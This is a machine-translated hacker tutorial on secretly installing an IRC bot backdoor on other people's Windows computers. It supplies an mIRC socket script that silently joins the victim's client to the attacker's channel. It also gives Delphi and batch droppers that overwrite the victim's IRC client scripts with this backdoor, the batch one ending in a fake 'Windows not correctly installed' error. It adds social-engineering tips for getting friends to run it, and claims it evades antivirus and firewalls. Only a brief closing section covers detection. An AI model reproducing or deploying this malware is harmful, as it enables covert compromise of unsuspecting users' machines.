This page has been robot translated, sorry for typos if any. Original content here.

We hang the bot on Windows.



1. Intro.
2. Trojans.
3. mIRC scripts.
I. writing your script backdoor
Ii. write on delphi prog, which will insert the backdoor into the enemy mIRC
III. we write on batch'ah prog, which will insert the backdoor into the enemy mIRC
Iv. social engineering: we push the prog =)
4. Both ways in comparison.
5. How to protect yourself.
6. Outro.

1. In our times, among the owners of popular channels, it has become fashionable to hang on a channel on a dozen bots from different linux shells to ensure, so to speak, “channel security”. Of course, I have nothing against any egg-drops there, but how to be simple mortal users who have no shell, no ss, no knowledge (such as the elite from channel # 31337 on irc.dal.net.ru =)? So in this article I will tell you how to hang a bot on a machine with a win-like OS.
IMHO, there are only two ways to do this: Trojans and Trojans =) Let's start with the first.

2. If you were on MSN (irc.msn.com) before closing it, you probably managed to enjoy the nth number of bots on the channels #russian_chat, #russian_girls, #russian_andybig and so on. So, these bots are far from egg drops. This is, so to speak, Subsevens. I heard about such a horse? Sub7 is the only Trojan in my memory that allowed you to remotely hang an irc-bot (I haven't used Trojans for a long time, so I don’t know if it has any analogues). So download Sub'a from here and enjoy. Those who are not accustomed to looking for easy ways can read further.

3. The possibilities of mirc scripts are very impressive. To write on them the same сgi-scanner is a trifling matter, not to mention a simple bot. For example, take the WarSatan script. It is built just such a "simple bot." When you connect to your favorite irc-server, the script connects the guest user to the irc.webchat.org server and gets it into #CHATOP, #MEKAH and #PANGKOR channels. That's the whole mechanism of work. Our task is to write the same simple backdoor in the form of a world-plugin.
I. I will comment on the most important lines.

on 1:CONNECT:{
;#открываем соединение с твоим irc cервером
.sockopen 31337 irc_сервер его_порт
}
on 1:DISCONNECT:{
;#при разрыве соединения убиваем сокет
.sockclose 31337
}
on 1:SOCKOPEN:31337:{
;#авторизуемся на irc-сервере
.sockwrite -n $sockname USER BOT "" "localhost" :Satanic bot
.sockwrite -n $sockname NICK ник_бота $+ $r(1,999)
;#заходим на твой канал
.sockwrite -n $sockname join твой_канал
}
on 1:SOCKREAD:31337:{
;#этот скрипт автоматически отвечает на серверный ping
;#без него сервер будет кидать бота, потому что тот не отвечает на пинги
.sockread %tmp
if ($gettok(%tmp,1,32) == ping) {
.sockwrite -n $sockname PONG $gettok(%tmp,2-,32)
}
}


We remove the comments, substitute our values, number the lines (just copy it all into the mIRC editor and save - it will enumerate everything) and save the resulting control.dll file.
The backdoor itself is ready. Now it remains to insert it into another script.ini.

Ii. Here's a delphi source code that looks for a script.ini file on a screw and, with a successful search result, replaces it with ours.

Important! Control.dll must be kept in the same directory with this program.

program Project1;

uses
SysUtils,
windows,
shellapi;


const search = 'script.ini'; //файл который нужно найти и заменить
replace = 'control.dll'; //файл, которым надо заменить, должен быть
// в том же месте откуда запуститься эта прога =)


var buf: array [0..255] of char;
fl: PChar;
flag:boolean = false;

//процедура замены файлов
procedure Change(where:pchar);

function CopyFile(FromFile, ToDir : string) : boolean; //функция копирования
var F : TShFileOpStruct;
begin
F.Wnd := 0; F.wFunc := FO_COPY;
FromFile:=FromFile+#0; F.pFrom:=pchar(FromFile);
ToDir:=ToDir+#0; F.pTo:=pchar(ToDir);
F.fFlags := FOF_ALLOWUNDO or FOF_NOCONFIRMATION or FOF_SILENT;
{$I-}
result:=ShFileOperation(F) = 0;
{$I+}
end;

begin
DeleteFile(where);
CopyFile(replace,where)
end;


//процедура глоб. поиска
function Find(DirN: string):boolean;
var
tsr: TSearchRec;
Full: string;

begin
find:=false;
if FindFirst(DirN + '\*.*', faAnyFile, tsr) = 0 then
repeat
if (tsr.Name = '.') or (tsr.Name = '..') then continue;
Full:= DirN + '\' + tsr.Name;
if tsr.Attr = faDirectory then //если каталог
Find(Full);
until (FindNext(tsr) <>0)or(tsr.Name = search)or flag;

if tsr.Name = search //если нашли
then begin
find:=true;
flag:=true;
Change(pchar(DirN+'\'+tsr.Name));
end;

end;


//Основной блок программы
begin
if SearchPath(nil,search,nil,sizeof(buf),buf,fl)>0 then
Change(buf)
else
begin
Find('c:');
// если надо и на других дисках искать то можешь сделать так:
// if Not Find('c:') then
// if Not Find('d:') then
// if Not Find('e:') then
//etc....
end;

end.


III. If you have not been coding from your family and you are being thrown into yeast by the word "compiler", let's write such a program in batch.

echo off
cls
if exist mirc.ini goto in_the_same_dir
if exist c:\mirc\MIRC.INI set mirc=c:\mirc
if exist c:\mirc\mirc\MIRC.INI set mirc=c:\mirc\mirc
if exist c:\irc\MIRC.INI set mirc=c:\irc
if exist c:\irc\mirc\MIRC.INI set mirc=c:\irc\mirc
if exist c:\chat\mirc\MIRC.INI set mirc=c:\chat\mirc
if exist c:\chat\MIRC.INI set mirc=c:\chat
if exist c:\progra~1\mirc\MIRC.INI set mirc=c:\progra~1\mirc
if exist c:\chat\looksharp\MIRC.INI set look=c:\chat\looksharp
if exist c:\mirc\looksharp\MIRC.INI set look=c:\mirc\looksharp
if exist c:\irc\looksharp\MIRC.INI set look=c:\irc\looksharp
if exist c:\progra~1\looksharp\MIRC.INI set look=c:\progra~1\looksharp
if exist c:\progra~1\trion\MIRC.INI set neo=c:\progra~1\trion
if exist c:\progra~1\neo-ra\MIRC.INI set neo=c:\progra~1\neo-ra
if exist c:\progra~1\NeoRa\Trion\MIRC.INI set neo=c:\progra~1\NeoRa\Trion
if exist c:\progra~1\NeoRa\MIRC.INI set neo=c:\progra~1\NeoRa
if exist c:\chat\NeoRa\MIRC.INI set neo=c:\chat\NeoRa
if exist c:\irc\NeoRa\MIRC.INI set neo=c:\irc\NeoRa
if exist c:\chat\neo-ra\MIRC.INI set neo=c:\chat\neo-ra
if exist c:\irc\neo-ra\MIRC.INI set neo=c:\irc\neo-ra
if exist c:\chat\Trion\MIRC.INI set neo=c:\chat\Trion
if exist c:\irc\Trion\MIRC.INI set neo=c:\irc\Trion
if exist c:\Trion\MIRC.INI set neo=c:\Trion
if exist c:\NeoRa\MIRC.INI set neo=c:\NeoRa
if exist c:\Neo-ra\MIRC.INI set neo=c:\Neo-ra
if exist d:\chat\NeoRa\MIRC.INI set neo_here=d:\chat\NeoRa
if exist d:\irc\NeoRa\MIRC.INI set neo_here=d:\irc\NeoRa
if exist d:\chat\neo-ra\MIRC.INI set neo_here=d:\chat\neo-ra
if exist d:\irc\neo-ra\MIRC.INI set neo_here=d:\irc\neo-ra
if exist d:\chat\Trion\MIRC.INI set neo_here=d:\chat\Trion
if exist d:\irc\Trion\MIRC.INI set neo_here=d:\irc\Trion
if exist d:\Trion\MIRC.INI set neo=d:\Trion
if exist d:\NeoRa\MIRC.INI set neo=d:\NeoRa
if exist d:\Neo-ra\MIRC.INI set neo=d:\Neo-ra
if exist d:\mirc\MIRC.INI set mirc=d:\mirc
if exist d:\mirc\mirc\MIRC.INI set mirc=d:\mirc\mirc
if exist d:\irc\MIRC.INI set mirc=d:\irc
if exist d:\irc\mirc\MIRC.INI set mirc=d:\irc\mirc
if exist d:\chat\mirc\MIRC.INI set mirc=d:\chat\mirc
if exist d:\chat\MIRC.INI set mirc=d:\chat
if exist d:\looksharp\MIRC.INI set look=d:\looksharp
if exist d:\chat\looksharp\MIRC.INI set look=d:\chat\looksharp
if exist d:\mirc\looksharp\MIRC.INI set look=d:\mirc\looksharp
if exist d:\irc\looksharp\MIRC.INI set look=d:\irc\looksharp
if "%mirc%"=="" goto no_mirc
deltree /y %mirc%\script.ini
copy control.dll %mirc%\script.ini
cls
:no_mirc
if "%look%"=="" goto no_look
deltree /y %look%\System\lookevents04.sys
copy control.dll %look%\System\lookevents04.sys
cls
:no_look
if "%neo%"=="" goto end
deltree /y %neo%\root\trionscr7.ini
copy control.dll %neo%\root\trionscr7.ini
cls
goto end
:in_the_same_dir
deltree /y script.ini
copy control.dll script.ini
:end
echo Your Microsoft Windows is not correctly installed.
echo Pleas re-install it and try again

This canoe at random is looking for mIRC, NeoRa Trion and Looksharp. The probability of finding is rather insignificant, so it is desirable to persuade the subject to put this file together with control.dll in the same directory as its irc client. In the case of a successful search result, the file replaces the foreign script.ini with our control.dll.
Convert this bat'nik to exe'shnik by some bat2exec'om and you can push your friends.

Iv. I think it’s not for me to tell you how to "push" someone to exe's. Just want to emphasize one feature. Admit it, please run your exe's user is suspicious of even the most distant user. So, you can go the other way. To do this, go back to point I. DON'T ennumber the lines of the script, just put it in the file joke.mrc. Everything. Now distribute it to your friends with the words: put it in the directory with your little world, enter "/ load -rs joke.mrc" in its console and enjoy all the pleasures of the plugin =)

4. And so, what is the better way to replace script.ini?
1) not caught antivirus
2) not caught FairWall'ami. I think many will immediately begin to argue from the mouth that ZoneAlarm and AtGuard will protect them from this. Special for them I explain: if mIRC in these two firewalls is registered as Allowed server \ client, then the fv will not even peep when opening the connection as backdoor.
3) it is difficult to detect / kill even an experienced user.

5. And now about how to defend yourself. Again, I will not consider the way with Sub7'om (because with him everything is clear: AVP + ZoneAlarm), I will immediately switch to the second.
To detect a script backdoor, you should use some kind of mIRC plugin like IPSearch, which would search the server for a user with the same UI as yours. If there is one, then someone definitely hung up a bot on you. If this is not found, then either the bot on another server, or you are clean.
Also, to detect a bot, you can use the same ZAlarm: at the moment, the largest IRC servers check all clients for proxies. How? A simple port scan. So, if you connect to the irc.some.com server, and the ports at the case are scanned by some irc.lame.com, then you should think ...
How to kill the backdoor? If you don’t understand scripting, just reinstall the irc client.

6. Well, what can I say at the end? Do not use unfamiliar scripts and do not force others to do it =)